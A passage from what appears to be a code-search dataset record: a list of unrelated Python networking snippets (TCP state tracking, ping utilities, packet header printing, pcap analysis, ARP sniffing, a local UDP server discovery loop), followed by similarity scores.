self.dip:\n if inc_tcp_seq_number(prev_c_tcp.seq, max(get_tcp_packet_payload_len(prev_c_pkt), 1)) == tcp.ack:\n logger.info(\"Received a ACK for FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.FIN_WAIT_2\n self._s_state = 
TCPState.CLOSE_WAIT\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n if fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self._c_state == TCPState.FIN_WAIT_1:\n self._s_state = self._c_state = TCPState.CLOSING\n else:\n self._s_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._s_state == TCPState.FIN_WAIT_1 and self._c_state == TCPState.ESTABLISHED:\n if ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and sip == self.sip:\n if inc_tcp_seq_number(prev_s_tcp.seq, max(get_tcp_packet_payload_len(prev_s_pkt), 1)) == tcp.ack:\n logger.info(\"Received a ACK for FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.FIN_WAIT_2\n self._c_state = TCPState.CLOSE_WAIT\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n if fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self._s_state == TCPState.FIN_WAIT_1:\n self._s_state = self._c_state = TCPState.CLOSING\n else:\n self._c_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.FIN_WAIT_2:\n if sip == self.sip:\n if ack_flag:\n slide_window()\n if self._s_state == TCPState.LAST_ACK:\n if (num_pkt_session_pkt < len(self.sessions[self.session_count]) and\n inc_tcp_seq_number(prev_s_tcp.seq,\n max(get_tcp_packet_payload_len(prev_s_pkt), 1)) == tcp.ack):\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if self._s_state == TCPState.CLOSE_WAIT and ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._s_state == TCPState.FIN_WAIT_2:\n if sip == self.dip:\n if ack_flag:\n slide_window()\n if (self._c_state == TCPState.LAST_ACK and\n num_pkt_session_pkt < len(self.sessions[self.session_count]) and\n inc_tcp_seq_number(prev_c_tcp.seq,\n max(get_tcp_packet_payload_len(prev_c_pkt), 1)) == tcp.ack):\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if self._c_state == TCPState.CLOSE_WAIT and ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.CLOSING or self._s_state == TCPState.CLOSING:\n if ack_flag:\n slide_window()\n if sip == self.sip and num_pkt_session_pkt < len(self.sessions[self.session_count]):\n if inc_tcp_seq_number(ack_flag and prev_s_tcp.seq, 1) == tcp.ack:\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: 
{}\".format(self.get_printable_state()))\n else:\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and \\\n inc_tcp_seq_number(ack_flag and prev_c_tcp.seq, 1) == tcp.ack:\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n logger.info(\"Packet didn't match any valid state: {}\".format(tcp_pkt_debug_info(ip)))\n #self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n logger.debug(self.get_printable_state())", "def test_ignore_non_arp_packets(self):\n packet = IP(dst='www.apple.com') / TCP(dport=80) / Raw(b'test')\n\n chef = ARPChef()\n dumpling = chef.packet_handler(packet)\n\n assert chef.ip_mac == {}\n assert dumpling is None", "def before_resend(self, packet):\n pass", "def eos_ping(eos, ipaddr, count=2, timeout=3, interface=None, size=None, ttl=None, verbose=False):\n\n cmd = \"sudo ping -c{c} {ip} -W {to}\".format(c=count, ip=ipaddr, to=timeout)\n if interface is not None:\n cmd += \" -I {}\".format(interface)\n if size is not None:\n cmd += \" -s {}\".format(size)\n if ttl is not None:\n cmd += \" -t {}\".format(ttl)\n\n output = eos.command(cmd, module_ignore_errors=True)\n if verbose:\n logger.info(\"Ping : %s\" % cmd)\n logger.info(\"Result: %s\", output['stdout_lines'][-2:])\n\n output['parsed'] = parse_ping(output['stdout_lines'])\n\n if \"Network is unreachable\" in output['stderr']:\n raise AssertionError('Network is unreachable')\n\n if \"error code\" in output['stdout_lines'][-1]:\n raise AssertionError(output['parsed'])\n\n if \"0% packet loss\" not in output['stdout_lines'][-2]:\n logger.warning(\"Did not find 0 percent packet loss: %s\" % output['stdout_lines'][-2:])\n raise AssertionError(\"Ping failed: %s\" % output['parsed'])\n\n return output", "def output_generator(pkt):\r\n ethe_header = pkt[0]\r\n ip_header = pkt[1]\r\n protocol = pkt[1][7]\r\n data_header = pkt[2]\r\n ethe_prefix = \"ETHER: \"\r\n ip_prefix = \"IP: \"\r\n tcp_prefix = \"TCP: \"\r\n udp_prefix = \"UDP: \"\r\n icmp_prefix = \"ICMP: \"\r\n # print ether header information\r\n print(\"\\n\" + ethe_prefix + \"----- Ether Header -----\")\r\n print(ethe_prefix)\r\n print(ethe_prefix + \"Packet size = \" + str(ethe_header[0]) + \" bytes\")\r\n print(ethe_prefix + \"Destination = \" + str(ethe_header[1]))\r\n print(ethe_prefix + \"Source = \" + str(ethe_header[2]))\r\n print(ethe_prefix + \"Ethertype = \" + str(ethe_header[3]) + \" (IP)\")\r\n print(ethe_prefix)\r\n\r\n print(ip_prefix + \"----- IP Header -----\")\r\n print(ip_prefix)\r\n print(ip_prefix + \"Version = \" + str(ip_header[0]))\r\n print(ip_prefix + \"Header length = \" + str(4 * int(ip_header[1])) + \" bytes\")\r\n print(ip_prefix + \"Type of service = 0x\" + str(ip_header[2]))\r\n if str(ip_header[2]) == \"00\":\r\n print(ip_prefix + \"\\txxx. .... = 0 (precedence)\")\r\n print(ip_prefix + \"\\t...0 .... = normal delay\")\r\n print(ip_prefix + \"\\t.... 0... = normal throughput\")\r\n print(ip_prefix + \"\\t.... .0.. = normal reliability\")\r\n print(ip_prefix + \"Total length = \" + str(ip_header[3]) + \" bytes\")\r\n print(ip_prefix + \"Identification = \" + str(ip_header[4]))\r\n print(ip_prefix + \"Flags = 0x\" + str(ip_header[5]))\r\n flag = str(format(int(ip_header[5][0]), '04b'))\r\n if flag[0] == \"0\":\r\n print(ip_prefix + \"\\t0... ... 
= Reserved bit: Not set\")\r\n else:\r\n print(ip_prefix + \"\\t1... ... = Reserved bit: set\")\r\n if flag[1] == \"0\":\r\n print(ip_prefix + \"\\t.0.. ... = Don't fragment: Not set\")\r\n else:\r\n print(ip_prefix + \"\\t.1.. ... = Don't fragment: set\")\r\n if flag[2] == \"0\":\r\n print(ip_prefix + \"\\t..0. ... = More fragments: Not set\")\r\n else:\r\n print(ip_prefix + \"\\t..1. ... = More fragments: set\")\r\n flag_offset = str((int(ip_header[5][2:3])))\r\n print(ip_prefix + \"Fragment offset = \" + flag_offset + \" bytes\")\r\n print(ip_prefix + \"Time to live = \" + str(ip_header[6]) + \" seconds/hops\")\r\n if protocol == 1:\r\n print(ip_prefix + \"Protocol = \" + str(protocol) + \" (ICMP)\")\r\n if protocol == 17:\r\n print(ip_prefix + \"Protocol = \" + str(protocol) + \" (UDP)\")\r\n if protocol == 6:\r\n print(ip_prefix + \"Protocol = \" + str(protocol) + \" (TCP)\")\r\n print(ip_prefix + \"Header checksum = \" + str(ip_header[8]))\r\n print(ip_prefix + \"Source address = \" + str(ip_header[9]))\r\n print(ip_prefix + \"Destination address = \" + str(ip_header[10]))\r\n if ip_header[11] == \"\":\r\n print(ip_prefix + \"No options\")\r\n else:\r\n print(ip_prefix + \"Options: \" + ip_header[11])\r\n print(ip_prefix)\r\n\r\n if protocol == 1:\r\n print(icmp_prefix + \"----- ICMP Header -----\")\r\n print(icmp_prefix)\r\n if str(data_header[0]) == \"8\":\r\n print(icmp_prefix + \"Type = \" + str(data_header[0]) + \" (Echo request)\")\r\n elif str(data_header[0]) == \"0\":\r\n print(icmp_prefix + \"Type = \" + str(data_header[0]) + \" (Echo reply)\")\r\n else:\r\n print(icmp_prefix + \"Type = \" + str(data_header[0]))\r\n print(icmp_prefix + \"Code = \" + str(data_header[1]))\r\n print(icmp_prefix + \"Checksum = \" + str(data_header[2]))\r\n print(icmp_prefix)\r\n\r\n elif protocol == 6:\r\n print(tcp_prefix + \"----- TCP Header -----\")\r\n print(tcp_prefix)\r\n print(tcp_prefix + \"Source port = \" + str(data_header[0]))\r\n print(tcp_prefix + \"Destination port = \" + str(data_header[1]))\r\n print(tcp_prefix + \"Sequence number = \" + str(data_header[2]))\r\n print(tcp_prefix + \"Acknowledgement number = \" + str(data_header[3]))\r\n print(tcp_prefix + \"Data offset = \" + str(data_header[4]) + \" bytes\")\r\n flag = str(data_header[5])\r\n print(tcp_prefix + \"\\tReserved: Not set\")\r\n print(tcp_prefix + \"\\tNonce: Not set\")\r\n if flag[0] == \"0\":\r\n print(tcp_prefix + \"\\tCWR: Not set\")\r\n else:\r\n print(tcp_prefix + \"\\tCWR: Set\")\r\n if flag[1] == \"0\":\r\n print(tcp_prefix + \"\\tECN-Echo : No set\")\r\n else:\r\n print(tcp_prefix + \"\\tECN-Echo: Set\")\r\n if flag[2] == \"0\":\r\n print(tcp_prefix + \"\\tUrgent: Not set\")\r\n else:\r\n print(tcp_prefix + \"\\tUrgent: Set\")\r\n if flag[3] == \"0\":\r\n print(tcp_prefix + \"\\tAcknowledgment: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tAcknowledgment: Set\")\r\n if flag[4] == \"0\":\r\n print(tcp_prefix + \"\\tPush: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tPush: Set\")\r\n if flag[5] == \"0\":\r\n print(tcp_prefix + \"\\tReset: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tReset: Set\")\r\n if flag[6] == \"0\":\r\n print(tcp_prefix + \"\\tSyn: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tSyn: Set\")\r\n if flag[7] == \"0\":\r\n print(tcp_prefix + \"\\tFin: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tFin: Set\")\r\n print(tcp_prefix + \"Window = \" + str(data_header[6]))\r\n print(tcp_prefix + \"Checksum 0x= \" + str(data_header[7]))\r\n print(tcp_prefix + \"Urgent pointers = \" + 
str(data_header[8]))\r\n if data_header[9] != 0:\r\n print(tcp_prefix + \"Options\")\r\n else:\r\n print(tcp_prefix + \"No options\")\r\n print(tcp_prefix)\r\n\r\n elif protocol == 17:\r\n print(udp_prefix + \"----- UDP Header -----\")\r\n print(udp_prefix)\r\n print(udp_prefix + \"Source port = \" + str(data_header[0]))\r\n print(udp_prefix + \"Destination port = \" + str(data_header[1]))\r\n print(udp_prefix + \"Length = \" + str(data_header[2]))\r\n print(udp_prefix + \"Checksum = \" + str(data_header[3]))\r\n print(udp_prefix)", "def ack_or_timeout(receiver):\n\n timeout_starts = time.time() \n while not receiver.available(pipes[0]) and (time.time() - timeout_starts) < 1:\n time.sleep(0.01)", "def compute_mptcp_dss_retransmissions(pcap_filepath, mptcp_connections, fast_conns, ts_syn_timeout=6.0, ts_timeout=3600.0):\n print(\"Computing MPTCP DSS retransmissions for\", pcap_filepath)\n acks = {}\n conn_acks = {}\n # Avoid processing packets that do not belong to any analyzed TCP connection\n black_list = set()\n pcap_file = open(pcap_filepath)\n pcap = dpkt.pcap.Reader(pcap_file)\n count = 0\n for ts, buf in pcap:\n ts_delta = get_ts_delta(ts)\n count += 1\n if count % 100000 == 0:\n print(count)\n eth = dpkt.ethernet.Ethernet(buf)\n if type(eth.data) == dpkt.ip.IP or type(eth.data) == dpkt.ip6.IP6:\n ip = eth.data\n if type(ip.data) == dpkt.tcp.TCP:\n tcp = ip.data\n fin_flag = (tcp.flags & dpkt.tcp.TH_FIN) != 0\n syn_flag = (tcp.flags & dpkt.tcp.TH_SYN) != 0\n rst_flag = (tcp.flags & dpkt.tcp.TH_RST) != 0\n ack_flag = (tcp.flags & dpkt.tcp.TH_ACK) != 0\n\n saddr, daddr, sport, dport = get_ips_and_ports(eth, ip, tcp)\n\n if syn_flag and not ack_flag and not fin_flag and not rst_flag:\n process_mptcp_first_syn(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport, black_list, fast_conns,\n ts_syn_timeout, ts_timeout)\n\n elif (saddr, sport, daddr, dport) in black_list:\n continue\n\n elif syn_flag and ack_flag and not fin_flag and not rst_flag:\n process_mptcp_syn_ack(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport, black_list, fast_conns,\n ts_syn_timeout, ts_timeout)\n\n elif not syn_flag and not rst_flag and ack_flag:\n if (saddr, sport, daddr, dport) in acks:\n process_mptcp_pkt_from_client(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport)\n\n elif (daddr, dport, saddr, sport) in acks:\n process_mptcp_pkt_from_server(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport)\n else:\n # Silently ignore those packets\n # print(saddr, sport, daddr, dport, \"haven't seen beginning...\")\n continue\n\n pcap_file.close()", "def receive_ping(my_socket, ID, timeout):\n start_time = timeout\n while True:\n start_select = time.clock()\n # select.select(rlist, wlist, xlist[, timeout])\n # wait until ready for read / write / exceptional condition\n # The return value is a triple of lists\n what_ready = select.select([my_socket], [], [], start_time)\n how_long = (time.clock() - start_select)\n if what_ready[0] == []: #timeout\n return\n\n time_received = time.clock()\n # socket.recvfrom(bufsize[, flags])\n # The return value is a pair (string, address)\n rec_packet, addr = my_socket.recvfrom(1024)\n icmp_header = rec_packet[20 : 28]\n ip_type, code, checksum, packet_ID, sequence = struct.unpack(\"bbHHh\", icmp_header)\n if ip_type != 8 and packet_ID == ID: # ip_type should be 0\n byte_in_double = struct.calcsize(\"d\")\n time_sent = struct.unpack(\"d\", rec_packet[28 : 28 + 
byte_in_double])[0]\n return time_received - time_sent\n\n start_time = start_time - how_long\n if start_time <= 0:\n return", "def onPing(self, payload):\n super().onPing(payload)\n self.log.debug(\"Pinged: {}\".format(payload))\n self.log.debug(self.last_ping)\n self.log.debug(time.time() - self.last_ping)\n # If groupme's \"ping\" takes longer than 32 seconds, reset connection\n if not (not (time.time() - self.last_ping > 32) and not (time.time() - self.start_time > self.timeout)):\n self.sendClose()", "def handle_ping(self, message_header, message):\n\t\tpong = Pong()\n\t\tpong.nonce = message.nonce\n\t\tself.send_message(pong)", "def ping(self, ip):\n res = self.cli('ping ' + ip)\n # '8 bytes from fdde:ad00:beef:0:0:ff:fe00:e000: icmp_seq=2 hlim=64 time=236ms\\r\\n'\n # 'Error 6: Parse\\r\\n'\n # no answer\n ret_time = -1\n try:\n ret_time = int(res.split('time=')[1].split('ms')[0])\n except Exception:\n pass\n return ret_time", "def tests():\n\n global ToartalCount1, ToartalCount2\n s = initTcpConn()\n sock, mreq = initUDPconn()\n s.listen(1)\n while True:\n timer = time.time() + 10\n while time.time() < timer:\n sock.sendto(mreq, (LocalIP, 13117))\n time.sleep(1)\n s.settimeout(0)\n try:\n conn, add = s.accept()\n except:\n print(\"accepting connection faild\")\n conn.setblocking(1)\n data=conn.recv(BufferSize)\n print(\"hii \" + data.decode() + \" welcome to the game\")\n try:\n conn.sendall(\"Please Enter what ever you want you have 10 sec\".encode())\n except:\n print(\"sending starting mss faild\")\n timer = time.time() + 10\n while time.time() < timer:\n ch = conn.recv(1)\n count = count + 1\n print(count)", "def SendTimeout(self) -> int:", "def SendTimeout(self) -> int:", "def getServerIP():\n # Create a UDP socket at client side\n UDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n UDPClientSocket.settimeout(0.15)\n\n \n for i in ['127.0.0.1']+list(range(0,256)):#iterating through all network IPs....127.0.0.1 is localhost\n try:\n IP=\"192.168.2.\"+str(i) if i!='127.0.0.1' else i #\n print(IP,end=\" \") \n UDPClientSocket.sendto(bytesToSend, (IP, 20001))#send message\n msg,IP = UDPClientSocket.recvfrom(bufferSize)#get response\n if (msg==str.encode(ACK_MESSAGE)):\n print()#printed IP wont clear without this command\n cls()#if IP found it clears all the console \n return IP[0]\n except Exception as e:\n print(e)\n \n return 0", "def ping(worker,count=4):\n ip=worker[1]\n \n ping = subprocess.Popen(\n [\"ping\", \"-c\", str(count), str(ip)],\n stdout = subprocess.PIPE,\n stderr = subprocess.PIPE\n )\n \n out, error = ping.communicate()\n \n #if anything is wrong stdout will be blank, therefore failure\n if len(out)==0:\n return False\n \n #search for packet loss and return the percentage\n return int(re.search(\"(\\d*)\\% packet loss\",out).group(1))!=100", "def run_forever(self):\n scapy.sniff(prn=self.arp_cb, filter=\"arp\", store=0, count=0)", "def test_udp_query():\n assert dnsck_query(\"8.8.8.8\", \"google.com\", \"a\", 1) == 0", "def slot_keepalive_timer(self, _sender, _data):\r\n if self.connected:\r\n #self.debug(\"### sending keepalive\")\r\n self._try_send_raw(\"2::\")" ]
[ "0.64529324", "0.63816625", "0.6354133", "0.6196364", "0.61904454", "0.61332846", "0.6091843", "0.59220237", "0.5845445", "0.5802433", "0.5794148", "0.5763908", "0.57570946", "0.56948966", "0.56458026", "0.56425583", "0.563012", "0.56200063", "0.561671", "0.5613484", "0.5589428", "0.55827665", "0.55750597", "0.5555836", "0.55508804", "0.5536911", "0.5521988", "0.55014", "0.54927635", "0.54850596", "0.5461681", "0.54594654", "0.54487836", "0.5418109", "0.54085284", "0.54083455", "0.5390171", "0.53830004", "0.5365767", "0.53555095", "0.53549546", "0.53443795", "0.5293345", "0.5290358", "0.5280681", "0.5274256", "0.5265169", "0.5262563", "0.52453095", "0.52375156", "0.5232418", "0.5227771", "0.5213386", "0.52125794", "0.5182193", "0.51776826", "0.516955", "0.5168911", "0.51529425", "0.5131909", "0.5129721", "0.51160014", "0.5115128", "0.51075464", "0.50973916", "0.50933635", "0.50909185", "0.5083908", "0.508269", "0.50778013", "0.507705", "0.50760144", "0.5074156", "0.5070112", "0.5070112", "0.5070112", "0.5070112", "0.50698817", "0.5069673", "0.5069071", "0.506894", "0.50687796", "0.5063047", "0.50609046", "0.5054419", "0.5053589", "0.505043", "0.5038501", "0.5025972", "0.5024627", "0.50214475", "0.50214285", "0.5018618", "0.50156224", "0.5006085", "0.5006085", "0.5001214", "0.5000496", "0.4996893", "0.49946266", "0.49928787" ]
0.0
-1
load Load all modules.
def load(self): self.commands = { # Usual text commands (e.g. "/echo 123") 'user': {}, 'owner': { 'load': self.load, 'modprobe': self.modprobe, 'rmmod': self.rmmod }, # Modules for bot's reaction to a different message types 'text': {}, 'photo': {}, 'audio': {}, 'video': {}, 'sticker': {}, 'voice': {} } for file in os.listdir('modules'): if file.endswith('.py'): command_type, command = file.split('_', 1) self.modprobe(self, command[:-3])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def loadModule(*args, allModules: bool=True, load: AnyStr=\"\", scan: bool=True,\n **kwargs)->List[AnyStr]:\n pass", "def _load_modules(self):\n modules_src = os.path.abspath(\"src/modules\")\n\n # perform a tree walk over modules directory\n for file_name, file_path in self._tree_walk(modules_src):\n try:\n # try to find a spec for this file and construct a module\n # from it\n spec = spec_from_file_location(file_name, file_path)\n assert spec is not None\n module = module_from_spec(spec)\n assert spec.loader is not None\n spec.loader.exec_module(module)\n self.modules.append(module)\n self._loaded_modules_names.append(module.__name__)\n except:\n pass", "def load_shutit_modules(self):\n\t\tshutit_global.shutit_global_object.yield_to_draw()\n\t\tif self.loglevel <= logging.DEBUG:\n\t\t\tself.log('ShutIt module paths now: ',level=logging.DEBUG)\n\t\t\tself.log(self.host['shutit_module_path'],level=logging.DEBUG)\n\t\tfor shutit_module_path in self.host['shutit_module_path']:\n\t\t\tself.load_all_from_path(shutit_module_path)", "def _import_all(self):\n # on first load, documents dir may not be in import path\n if not self.app.documents_dir in sys.path:\n sys.path += [self.app.documents_dir]\n # clean modules dict before (re)loading anything\n self._remove_non_current_game_modules()\n # make copy of old modules table for import vs reload check\n old_modules = self.modules.copy()\n self.modules = {}\n # load/reload new modules\n for module_name in self._get_game_modules_list():\n try:\n # always reload built in modules\n if module_name in self.builtin_module_names or \\\n module_name in old_modules:\n m = importlib.reload(old_modules[module_name])\n else:\n m = importlib.import_module(module_name)\n self.modules[module_name] = m\n except Exception as e:\n self.app.log_import_exception(e, module_name)", "def load_modules(self):\n module_dir = os.path.dirname(__file__)\n names = [os.path.splitext(i) for i in os.listdir(module_dir)\n if os.path.isfile(os.path.join(module_dir, i))]\n # FIXME: sort 'plain' to start of list for devel.\n names.sort(key=lambda x: (not x[0].startswith('plain'), x[0]))\n modules = []\n for name in [i[0] for i in names if i[1].lower() == '.py']:\n try:\n modules.append(import_module('leo.plugins.editpane.' 
+ name))\n DBG(f\"Loaded module: {name}\")\n except ImportError as e:\n DBG(\n f\"{e.__class__.__name__}: \"\n f\"Module not loaded (unmet dependencies?): {name}\")\n for module in modules:\n for key in dir(module):\n value = getattr(module, key)\n if hasattr(value, 'lep_type') and value not in self.widget_classes:\n if module not in self.modules:\n self.modules.append(module)\n self.widget_classes.append(value)\n self.widget_for[value.lep_type].append(value)", "def handle_loadall(bot, ievent):\n plugs.loadall(plugin_packages, force=True)\n ievent.done()", "def load_modules_manually():\n #cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile( inspect.currentframe() ))[0]))\n cmd_folder = '../myutils/'\n if cmd_folder not in sys.path:\n sys.path.insert(0, cmd_folder)\n #print sys.path", "def load_modules(bot, config):\n for item in MODULES:\n importlib.import_module(\"cogs.\" + item).setup(bot, config)", "def loadall(bot) :\n for feature in features :\n load(bot, feature)", "def _load_modules(self):\n modules = []\n agent_cls_list = dashboard_utils.get_all_modules(\n dashboard_utils.DashboardAgentModule\n )\n for cls in agent_cls_list:\n logger.info(\n \"Loading %s: %s\", dashboard_utils.DashboardAgentModule.__name__, cls\n )\n c = cls(self)\n modules.append(c)\n logger.info(\"Loaded %d modules.\", len(modules))\n return modules", "def _load_module_recursive(self, dir) :\t\n\t\tfor filepath in os.listdir(dir) :\n\t\t\tfullpath = os.path.join(dir, filepath)\n\n\t\t\tif os.path.isdir(fullpath) :\n\t\t\t\tself._load_module_recursive(fullpath)\n\n\t\t\telif os.path.splitext(filepath)[1] == '.py' :\n\t\t\t\tutils.load_module(fullpath, self.settings.ROOT_PATH)", "def add_to_loaded_modules(self, modules):\n modules = util.return_set(modules)\n for module in modules:\n if not isinstance(module, str):\n module = module.__name__\n self.loaded_modules.add(module)", "def load_all_submodules():\n # Load all modules in the current directory.\n pattern_list = _load_all_modules(__file__, __name__)\n return pattern_list", "def _load_all_modules(path, names):\n module_names = []\n # For each module in the current directory...\n for importer, module_name, is_package in pkgutil.iter_modules(\n [os.path.dirname(path)]\n ):\n # print(\"importing:\", names + '.' + module_name)\n # Import the module.\n importlib.import_module(names + '.' 
+ module_name)\n module_names.append(module_name)\n\n return module_names", "def _load_defined_tasks():\n task_path = Path(__file__).parent.resolve() / \"nalu_tasks\"\n py_files = glob.glob(str(task_path / \"[a-z]*.py\"))\n modset = {Path(ff).stem for ff in py_files}\n for pymod in modset:\n importlib.import_module(\".%s\"%pymod, 'exawind.nalu.nalu_tasks')", "def _load_modules(self):\n moduledocs = self._docset.get_compounds(xml.Group,\n lambda x: x.get_name().startswith('module_'))\n for moduledoc in moduledocs:\n moduleobj = self._modules.get(moduledoc.get_name())\n if not moduleobj:\n self._reporter.input_error(\n \"no matching directory for module: {0}\".format(moduledoc))\n continue\n moduleobj.set_doc_xml(moduledoc, self)\n self._docmap[moduledoc] = moduleobj", "def load(self, *modules):\n for module in modules:\n if isinstance(module, six.string_types):\n try:\n module = get_object(module)\n except Exception as e:\n self.errors[module] = e\n continue\n self.modules[module.__package__] = module\n for (loader, module_name, is_pkg) in pkgutil.walk_packages(\n module.__path__):\n full_name = '{}.{}'.format(_package(module), module_name)\n try:\n self.modules[full_name] = get_object(full_name)\n if is_pkg:\n self.load(self.modules[full_name])\n except Exception as e:\n self.errors[full_name] = e", "def modules():", "def clear_loaded_modules(self):\n self._loaded_modules = []", "def loadAll(app, store, test=False):\n if test:\n loadTest(app, store)\n\n loadEnds(app, store)\n loadCors(app)\n loadErrors(app)", "def _load_all(self):\n if self._loaded_all is True:\n return\n for iface in self._scan:\n for bname in self._scan[iface]:\n if self._scan[iface][bname].get(\"loaded\"):\n continue\n self._load_item(iface, bname)\n self._loaded_all = True", "def load_handlers(self):\n\t\tself.handlers = []\n\t\tfor mod in os.listdir('classes/handlers'):\n\t\t\tif mod == '__init__.py' or mod[-3:] != '.py':\n\t\t\t\tcontinue\n\t\t\tlib = __import__(mod[:-3], locals(), globals())\n\t\t\tself.handlers.append(lib)\n\t\t#\n\t\tself.handlers.sort(key=lambda x: x.order, reverse=False)\n\t\tprint(\"Loaded handlers: \", ', '.join([x.tag for x in self.handlers]) )\n\t\tassert len(self.handlers)>0", "def modules_load(machine_config):\n\t#---modules in LOCAL configuration must be loaded before checking version\n\timport importlib\n\tif 'module_path' in machine_config: module_path = machine_config['module_path']\n\telse:\n\t\tmodule_parent = os.environ.get('MODULESHOME','/usr/share/Modules/default')\n\t\tmodule_path = os.path.join(module_parent,'init','python.py')\n\tincoming = {}\n\tif sys.version_info<(3,0): execfile(module_path,incoming)\n\telse: exec(open(module_path).read(),incoming)\n\t#---note that modules that rely on dynamically-linked C-code must use EnvironmentModules\n\tmodlist = machine_config['modules']\n\tif type(modlist)==str: modlist = modlist.split(',')\n\tfor mod in modlist:\n\t\t#---always unload gromacs to ensure correct version\n\t\tincoming['module']('unload','gromacs')\n\t\tprint('[STATUS] module load %s'%mod)\n\t\tincoming['module']('load',mod)", "def on_modules_loaded(self, loader, callback=None):\n enabled_list = self.get_enabled_modules()\n \n self.update_modules_priority(enabled_list)\n \n self._keybinder.connect(\"activated\", lambda k,t: self._emit_keybinding_activated(t))\n self._emit_loaded()\n \n for mod in enabled_list:\n modinst = self._module_list.get_module_instance_from_name( mod )\n if modinst != None:\n self._module_loader.initialize_module_async( modinst )\n 
self._loaded_modules += 1", "def load(self) -> t.Iterable[docspec.Module]:\n # Load all haystack modules\n temp_loader = PythonLoader(search_path=[\"../../../haystack\"])\n temp_loader.init(Context(directory=\".\"))\n all_modules = list(temp_loader.load())\n\n # Collect all classes\n classes = {}\n for module in all_modules:\n for member in module.members:\n if isinstance(member, docspec.Class):\n classes[member.name] = member\n\n # Load the modules specified in the search path\n modules = super().load()\n\n # Add inherited methods to the classes\n modules = self.include_inherited_methods(modules, classes)\n\n return modules", "def get_loaded_modules(self):\n return self._get_modules(self.loaded_modules)", "def _LoadPackages():\n return {module.__name__.split('.')[-1]: module for module in\n import_util.LoadModulesForPath(__path__, __name__)}", "def loadModules(path=None, ofType=None):\n \"\"\"returns a dictionary of loaded modules {name: type}\"\"\"\n import os\n import re\n import sys\n import inspect\n\n if path == None:\n path = os.path.dirname(__file__)\n\n path = os.path.realpath(path)\n modules = []\n\n find = re.compile(\".*\\.py$\", re.IGNORECASE)\n if os.path.isdir(path):\n toLoad = map(lambda f: os.path.splitext(f)[0], filter(find.search, os.listdir(path)))\n else:\n toLoad = [os.path.splitext(os.path.basename(path))[0]]\n sys.path.append(os.path.dirname(path))\n\n ret = {}\n logger = logging.getLogger(ActionManager.__name__)\n for moduleName in toLoad:\n try:\n module = __import__(moduleName, globals(), locals())\n for _, type_ in inspect.getmembers(module, inspect.isclass):\n if issubclass(type_, ofType) and not type_ == ofType:\n ret[type_.supportedClass] = type_\n logger.debug(\"Registering runner for type %s\" % type_.supportedClass)\n\n except Exception as e:\n logger.critical(\"Unable to import module %s, Exception: %s\" % (module, e))\n\n return ret", "def load_functions(self, module_name, path=None):\n# try:\n if True:\n if not path:\n path = os.getcwd()\n if not isinstance(path,list):\n path = [path]\n file,filename,desc = imp.find_module(module_name,path)\n funcs = imp.load_module(module_name, file, filename, desc)\n if hasattr(funcs,'_init'):\n getattr(funcs,'_init')(self)\n attrs = [attr for attr in funcs.__dict__ \n if not attr.startswith('__')\n and attr is not '_init'\n and not hasattr(getattr(funcs,attr),'__base__')]\n for attr in attrs:\n try:\n print 'Adding', attr, 'to', self._name\n self.add_function(getattr(funcs,attr))\n except:\n print 'Error adding', attr, 'to', self._name", "def reload(*mods):\n for mod in mods:\n importlib.reload(importlib.import_module(mod))", "def refresh(self):\n self.modules.clear()\n module_files = []\n module_paths = os.environ['MAYA_MODULE_PATH'].split(os.pathsep)\n for p in module_paths:\n try:\n module_files += [os.path.join(p, x).replace(os.sep, os.altsep or os.sep) for x in os.listdir(p) if\n x.lower()[-3:] == 